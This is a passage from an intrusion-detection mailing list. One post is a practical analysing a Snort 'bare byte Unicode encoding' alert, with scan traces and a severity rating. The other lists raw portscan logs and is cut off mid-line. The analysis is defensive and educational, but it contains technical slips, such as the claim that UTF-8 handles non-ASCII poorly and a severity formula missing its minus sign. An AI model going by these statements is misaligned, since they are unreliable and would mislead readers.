analysis. Thank you very much in advance and regards, Vilaiporn 1. Source of trace Source of trace was file 2003.12.15.6 downloaded from www.incidents.org/log. -Statistics (from Ethereal) File length: 3000044 Format: libpcap Start time: 2:07:16.936242 End time: 2:08:17.518422 Elapsed time between first and last packet: 60.582 seconds Packet count: 36672 Snapshot length: 96 I used the Statistics function of ethereal to summarize a list of IP addresses and MAC addresses in the file. And I looked up a vendor Ethernet MAC address from the web site http://www.coffer.com/mac_find/. Below is an architecture base on my understanding: 10.10.10.165 (00:03:47:8c:89:c2 Intel machine ) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE) Observation: File date and timestamp reported are different. The file name indicate that the data should be 2003/12/15 but the date specified in all packets actually indicated packets generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modify ip address, as checksum of all packets are correct. Or no obfuscation has been done. 2. Detect was generated by The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran the analysis with my Windows 2000 Server machine. I ran snort in the NIDS mode with standard snort ruleset downloaded on 2 May 2004. All rules files were enabled. Command that was used: C:\snort\bin\snort -r 2003.12.5.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full -r 2003.12.5.6 read source file 2003.12.5.6 -c c:\snort\etc\snort.conf run against the configuration file snort.conf -l ex1 log the output file (alert file and log file) in ex1 folder -X dump the raw packet data starting at the link layer (in this case, this is the Ethernet header) -d dump the application layer (dump the packet payloads with the packet headers) -A full display text alert with full packet headers The selected alert result is as follow: [**] (http_inspect) BARE BYTE UNICODE ENCODING [**] 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80 TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20 The snort rule that trigger the 'Bare Byte Unicode Encoding' was the http_inspect in the preprocessor configure. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine. preprocessor stream4_reassemble preprocessor http_inspect: global \ iis_unicode_map unicode.map 1252 preprocessor http_inspect_server: server default \ profile all ports { 80 8080 8180 } \ oversize_dir_length 500 Note that profile all includes the 'bare byte decoding' enabled. The following configuration were displayed when you run snort (without quiet option enabled). You can see that the bare byte option was set to YES. HttpInspect Config: GLOBAL CONFIG Max Pipeline Requests: 0 Inspection Type: STATELESS Detect Proxy Usage: NO IIS Unicode Map Filename: c:\snort\etc\unicode.map IIS Unicode Map Codepage: 1252 DEFAULT SERVER CONFIG: Ports: 80 8080 8180 Flow Depth: 300 Max Chunk Length: 500000 Inspect Pipeline Requests: YES URI Discovery Strict Mode: NO Allow Proxy Usage: NO Disable Alerting: YES Oversize Dir Length: 500 Only inspect URI: NO Ascii: YES alert: NO Double Decoding: YES alert: YES %U Encoding: YES alert: YES Bare Byte: YES alert: YES Base36: OFF UTF 8: OFF IIS Unicode: YES alert: YES Multiple Slash: YES alert: NO IIS Backslash: YES alert: NO Directory: YES alert: NO Apache WhiteSpace: YES alert: YES IIS Delimiter: YES alert: YES IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG Non-RFC Compliant Characters: NONE To look into the packet in details, I used windump to generate packet in hex format: C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host 192.168.17.68 and port 80" 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len 41) 10.10.10.165.1085 > 192. 168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) ack 380024539 win 17520 (DF) 4500 0029 a660 4000 8006 6dd3 0a0a 0aa5 c0a8 1144 043d 0050 e4f1 8713 16a6 b6db 5010 4470 b6b3 0000 9000 0000 0000 It's obvious that host 192.168.17.68 is a web server and it's IIS. The data field displayed in hex above is '90' (NOP bytes usually used by shellcode) which seems like someone is trying a buffer overflow on the web server. Let's also look at other packets associated with host 192.168.17.68 for a better analysis. C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host 192.168.17.68" 11/19-02:07:48.841453 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:51.828714 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:57.968183 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:59.094302 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:02.163499 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80 TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:08.302980 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:09.095015 10.10.10.165:1711 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:12.089067 10.10.10.165:1711 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Run time for packet processing was 0.750000 seconds The above information still not enough to analyse the intruder's attempt so I have merged all log files into one with the following command. C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 2003.12.15.11 2003.12.15.12 2003.12.15.13 2003.12.15.14 Then I ran snort again with the same set of rules. Some of the results that I got were shown below: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.114599 10.10.10.165:2695 -> 192.168.17.68:1 TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.115021 10.10.10.165:2696 -> 192.168.17.68:2 TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.116627 10.10.10.165:2697 -> 192.168.17.68:3 TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.117195 10.10.10.165:2698 -> 192.168.17.68:4 TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.117646 10.10.10.165:2699 -> 192.168.17.68:5 TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ The above are just sample packets. We can tell from the generated packets that the attacker did TCP port scan and UDP port scan to identified the open ports of host 192.168.17.68. Once port 80 is found running, the attack knew that this is a web server. So the attacker was trying to scan the server with, probably, web server scanning tools. 3. Probability the source address was spoofed HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake so it is unlikely that the source ip would be spoofed. 4. Description of attack [1] Bare byte encoding is an IIS trick that uses non-ASCII chars as valid values in decoding UTF-8 values. This is NOT in the HTTP standard, as all non-ASCII values have to be encoded with a %. Bare byte encoding allows the user to emulate an IIS server and interpret non-standard encodings correctly. There are no legitimate clients that encoded UTF-8 this way, since it is non-standard. For more descriptions on the terms being used, Unicode is a single unified character set. Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. [5] UTF-8 is a method to encode character to Unicode. (one of the three common encoding method) UTF-8 encodes each Unicode character as a variable number of 1 to 4 octets. Using Unicode/UTF-8, you can write in emails and source code things such as Mathematics and Sciences or different languages. ASCII - ASCII code is the numerical representation of a character. Because computer can only understand numbers. All non-ASCII characters usually screwed up when output it to the browser, such as some special character or language. UTF-8 supports ASCII characters but not very good in non-ASCII character. A http connection to the web server will usually start with a request method such as GET or POST. All packets (except for the highlighted one) has started a 3 way handshake by initiating SYN to the web server. Somehow the highlighted packet sent the packet with ACK flag set to the web server without the request method. This does not follow the RFC2616 and trigger snort rule to alert. The result from Ethereal actually display this packet at 'Continuation' which means there is no request in the packet. 5. Attack mechanism As I analyzed the combined log, I found that host 10.10.10.165 tried various attacks against host 192.168.17.68 including TCP scan, UDP scan, socks scan and probably Unicode attack. Usually I would try to obtain the correlation evidence from the secondary resource such as web server to confirm the attack. However, the secondary resource is not available in this case and we only have the snort log up to less than 2 hours. With such limitation I would assume that the attack using Unicode, somehow, was used as part of the scanning process and one of the scanning policy happen to use the non-ASCII character that trigger the snort rule to alert. To confirm my understanding, I set up a web server at home and wrote some e-commerce pages. Then I ran snort with the same rule set and used N-Stealth, a HTTP Security Scanner, to scan the e-commerce application that I created. N-Stealth used various combinations of possible web application attack and generated a lot of alerts including bare byte Unicode encoding' alerts. 6. Correlations Bare byte Unicode encoding is considered under the Unicode attack category. The Unicode attack was previously raised by Bruce Schneier at http://www.schneier.com/crypto-gram-0007.html 7. Evidence of active targeting The attacker was trying to scan for vulnerable host. Host 192.168.17.68 is not the key target at first. 8. Severity Severity = (criticality + lethality) (system countermeasures + network countermeasures) Criticality 4: This attack targets the IIS Server which is a widely used web server worldwide. Lethality 2: This attack could be part of the scanning and DoS. If successful, it could bring down the server. For this case, this server is not the target at first. The attacker performed host scanning to look for vulnerable host. The attacker may have succeeded compromise the server. From the log, there's no sign of system down. System countermeasures 2: The problem of IIS way of encoding the non-ASCII character cannot be resolved solely by patching. So I give 2. Network countermeasures 2: Firewalls and routers cannot prevent the Unicode attack that well. So I give 2 for this as well. Unless a specific web application firewall is being used, then I will give a higher rating. Severity = (4 + 2) - (2 + 2) = 2 9. Defensive recommendation -Apply necessary patches to prevent known vulnerabilities at the web server or operating system. -Apply a secure programming concept when developing the web application. Necessary input validation must be in place to filter out characters that will not be needed. For most of the case, non-ASCII character won't be needed for any field. -Have network measures in place such as properly configured router, firewalls and IDS. 10. Multiple choice questions Which web server could be vulnerable to 'bare byte Unicode encoding' attack? A. IIS B. Netscape C. Apache D. Any web server Answer: A __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail _______________________________________________ Intrusions mailing list Intrusions at lists.sans.org http://www.dshield.org/mailman/listinfo/intrusions From Ken.Connelly at uni.edu Mon Jul 12 12:13:31 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Mon, 12 Jul 2004 07:13:31 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LCD61RVV9W8YDL7A@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 11 07:47:26 69.157.228.177:62712 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62713 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62714 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62715 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62716 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62717 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62718 -> xxx.yyy.1.7:1433 SYN ******S* Jul 11 07:47:26 69.157.228.177:62719 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 11 22:32:41 69.157.228.177:61149 -> xxx.yyy.254.247:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61150 -> xxx.yyy.254.248:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61151 -> xxx.yyy.254.249:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61152 -> xxx.yyy.254.250:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61154 -> xxx.yyy.254.251:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61155 -> xxx.yyy.254.252:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61156 -> xxx.yyy.254.253:1433 SYN ******S* Jul 11 22:32:41 69.157.228.177:61157 -> xxx.yyy.254.254:1433 SYN ******S* Jul 11 22:32:43 69.157.228.177:60645 -> xxx.yyy.253.97:1433 SYN ******S* 86618 Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.1:4000 SYN ******S* Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.2:4000 SYN ******S* Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.3:4000 SYN ******S* Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.4:4000 SYN ******S* Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.5:4000 SYN ******S* Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.6:4000 SYN ******S* Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.7:4000 SYN ******S* Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.248:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.245:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.242:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.249:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.253:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.254:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.251:4000 SYN ******S* Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.252:4000 SYN ******S* 73426 Jul 11 21:28:37 64.230.147.239:1460 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1461 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1462 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1463 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1464 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1465 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 21:28:37 64.230.147.239:1466 -> xxx.yyy.1.7:1433 SYN ******S* Jul 11 21:28:34 64.230.147.239:1467 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 11 21:44:32 64.230.147.239:4350 -> xxx.yyy.255.215:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4351 -> xxx.yyy.255.216:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4352 -> xxx.yyy.255.217:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4356 -> xxx.yyy.255.219:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4357 -> xxx.yyy.255.220:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4358 -> xxx.yyy.255.221:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4359 -> xxx.yyy.255.222:1433 SYN ******S* Jul 11 21:44:32 64.230.147.239:4360 -> xxx.yyy.255.223:1433 SYN ******S* 71985 Jul 11 02:57:51 211.105.46.18:2300 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2299 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2302 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2301 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2303 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2304 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2305 -> xxx.yyy.1.7:1433 SYN ******S* Jul 11 02:57:54 211.105.46.18:2306 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 11 03:09:32 211.105.46.18:4008 -> xxx.yyy.255.247:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4009 -> xxx.yyy.255.248:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4005 -> xxx.yyy.255.244:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4007 -> xxx.yyy.255.246:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4004 -> xxx.yyy.255.243:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4010 -> xxx.yyy.255.249:1433 SYN ******S* Jul 11 03:09:32 211.105.46.18:4013 -> xxx.yyy.255.252:1433 SYN ******S* Jul 11 03:09:33 211.105.46.18:4015 -> xxx.yyy.255.254:1433 SYN ******S* Jul 11 03:09:33 211.105.46.18:4014 -> xxx.yyy.255.253:1433 SYN ******S* 71073 Jul 11 14:10:29 211.94.206.41:3402 -> xxx.yyy.1.1:443 SYN ******S* Jul 11 14:10:29 211.94.206.41:3403 -> xxx.yyy.1.2:443 SYN ******S* Jul 11 14:10:29 211.94.206.41:3404 -> xxx.yyy.1.3:443 SYN ******S* Jul 11 14:10:31 211.94.206.41:3405 -> xxx.yyy.1.4:443 SYN ******S* Jul 11 14:10:31 211.94.206.41:3406 -> xxx.yyy.1.5:443 SYN ******S* Jul 11 14:10:28 211.94.206.41:3407 -> xxx.yyy.1.6:443 SYN ******S* Jul 11 14:10:28 211.94.206.41:3408 -> xxx.yyy.1.7:443 SYN ******S* Jul 11 14:10:31 211.94.206.41:3409 -> xxx.yyy.1.8:443 SYN ******S* [...] Jul 11 14:22:09 211.94.206.41:2043 -> xxx.yyy.255.242:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2045 -> xxx.yyy.255.244:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2055 -> xxx.yyy.255.254:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2052 -> xxx.yyy.255.251:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2050 -> xxx.yyy.255.249:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2054 -> xxx.yyy.255.253:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2053 -> xxx.yyy.255.252:443 SYN ******S* Jul 11 14:22:09 211.94.206.41:2051 -> xxx.yyy.255.250:443 SYN ******S* 70829 Jul 11 23:45:27 216.229.142.202:2527 -> xxx.yyy.1.0:5554 SYN ******S* Jul 11 23:45:27 216.229.142.202:2528 -> xxx.yyy.1.1:5554 SYN ******S* Jul 11 23:45:27 216.229.142.202:2529 -> xxx.yyy.1.2:5554 SYN ******S* Jul 11 23:45:27 216.229.142.202:2530 -> xxx.yyy.1.3:5554 SYN ******S* Jul 11 23:45:29 216.229.142.202:2531 -> xxx.yyy.1.4:5554 SYN ******S* Jul 11 23:45:29 216.229.142.202:2532 -> xxx.yyy.1.5:5554 SYN ******S* Jul 11 23:45:29 216.229.142.202:2533 -> xxx.yyy.1.6:5554 SYN ******S* Jul 11 23:45:29 216.229.142.202:2534 -> xxx.yyy.1.7:5554 SYN ******S* [...] Jul 11 23:48:29 216.229.142.202:3876 -> xxx.yyy.255.235:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3893 -> xxx.yyy.255.251:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3899 -> xxx.yyy.255.254:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3880 -> xxx.yyy.255.239:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3884 -> xxx.yyy.255.242:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3890 -> xxx.yyy.255.248:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3887 -> xxx.yyy.255.245:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3877 -> xxx.yyy.255.236:5554 SYN ******S* Jul 11 23:48:29 216.229.142.202:3894 -> xxx.yyy.255.252:5554 SYN ******S* 69880 Jul 11 05:19:41 195.16.228.76:1257 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1258 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1259 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1260 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1261 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1262 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 05:19:41 195.16.228.76:1263 -> xxx.yyy.1.7:1433 SYN ******S* Jul 11 05:19:38 195.16.228.76:1264 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 11 05:31:19 195.16.228.76:3896 -> xxx.yyy.255.239:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3897 -> xxx.yyy.255.240:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3898 -> xxx.yyy.255.241:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3906 -> xxx.yyy.255.249:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3905 -> xxx.yyy.255.248:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3907 -> xxx.yyy.255.250:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3902 -> xxx.yyy.255.245:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3903 -> xxx.yyy.255.246:1433 SYN ******S* Jul 11 05:31:19 195.16.228.76:3904 -> xxx.yyy.255.247:1433 SYN ******S* 69527 Jul 11 05:15:43 199.35.73.80:3170 -> xxx.yyy.1.1:4000 SYN ******S* Jul 11 05:15:43 199.35.73.80:3171 -> xxx.yyy.1.2:4000 SYN ******S* Jul 11 05:15:43 199.35.73.80:3172 -> xxx.yyy.1.3:4000 SYN ******S* Jul 11 05:15:45 199.35.73.80:3173 -> xxx.yyy.1.4:4000 SYN ******S* Jul 11 05:15:45 199.35.73.80:3174 -> xxx.yyy.1.5:4000 SYN ******S* Jul 11 05:15:45 199.35.73.80:3175 -> xxx.yyy.1.6:4000 SYN ******S* Jul 11 05:15:45 199.35.73.80:3176 -> xxx.yyy.1.7:4000 SYN ******S* Jul 11 05:15:45 199.35.73.80:3177 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 11 05:24:20 199.35.73.80:1760 -> xxx.yyy.197.107:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1764 -> xxx.yyy.197.111:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1765 -> xxx.yyy.197.112:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1762 -> xxx.yyy.197.109:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1766 -> xxx.yyy.197.113:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1767 -> xxx.yyy.197.114:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1768 -> xxx.yyy.197.115:4000 SYN ******S* Jul 11 05:24:20 199.35.73.80:1769 -> xxx.yyy.197.116:4000 SYN ******S* 49519 Jul 11 05:07:35 216.177.242.60:1296 -> xxx.yyy.1.2:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1298 -> xxx.yyy.1.1:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1299 -> xxx.yyy.1.3:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1300 -> xxx.yyy.1.5:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1303 -> xxx.yyy.1.9:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1304 -> xxx.yyy.1.8:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1301 -> xxx.yyy.1.4:8000 SYN ******S* Jul 11 05:07:35 216.177.242.60:1302 -> xxx.yyy.1.7:8000 SYN ******S* [...] Jul 11 05:12:47 216.177.242.60:4008 -> xxx.yyy.255.247:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4009 -> xxx.yyy.255.248:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4010 -> xxx.yyy.255.250:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4011 -> xxx.yyy.255.249:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4013 -> xxx.yyy.255.252:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4014 -> xxx.yyy.255.253:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4012 -> xxx.yyy.255.251:8000 SYN ******S* Jul 11 05:12:47 216.177.242.60:4015 -> xxx.yyy.255.254:8000 SYN ******S* 43786 Jul 11 02:42:20 65.89.43.60:1486 -> xxx.yyy.1.1:4899 SYN ******S* Jul 11 02:42:20 65.89.43.60:1487 -> xxx.yyy.1.2:4899 SYN ******S* Jul 11 02:42:20 65.89.43.60:1488 -> xxx.yyy.1.3:4899 SYN ******S* Jul 11 02:42:19 65.89.43.60:1489 -> xxx.yyy.1.4:4899 SYN ******S* Jul 11 02:42:19 65.89.43.60:1490 -> xxx.yyy.1.5:4899 SYN ******S* Jul 11 02:42:19 65.89.43.60:1491 -> xxx.yyy.1.6:4899 SYN ******S* Jul 11 02:42:19 65.89.43.60:1492 -> xxx.yyy.1.7:4899 SYN ******S* Jul 11 02:42:19 65.89.43.60:1493 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 11 02:46:57 65.89.43.60:3415 -> xxx.yyy.255.246:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3416 -> xxx.yyy.255.247:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3417 -> xxx.yyy.255.248:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3418 -> 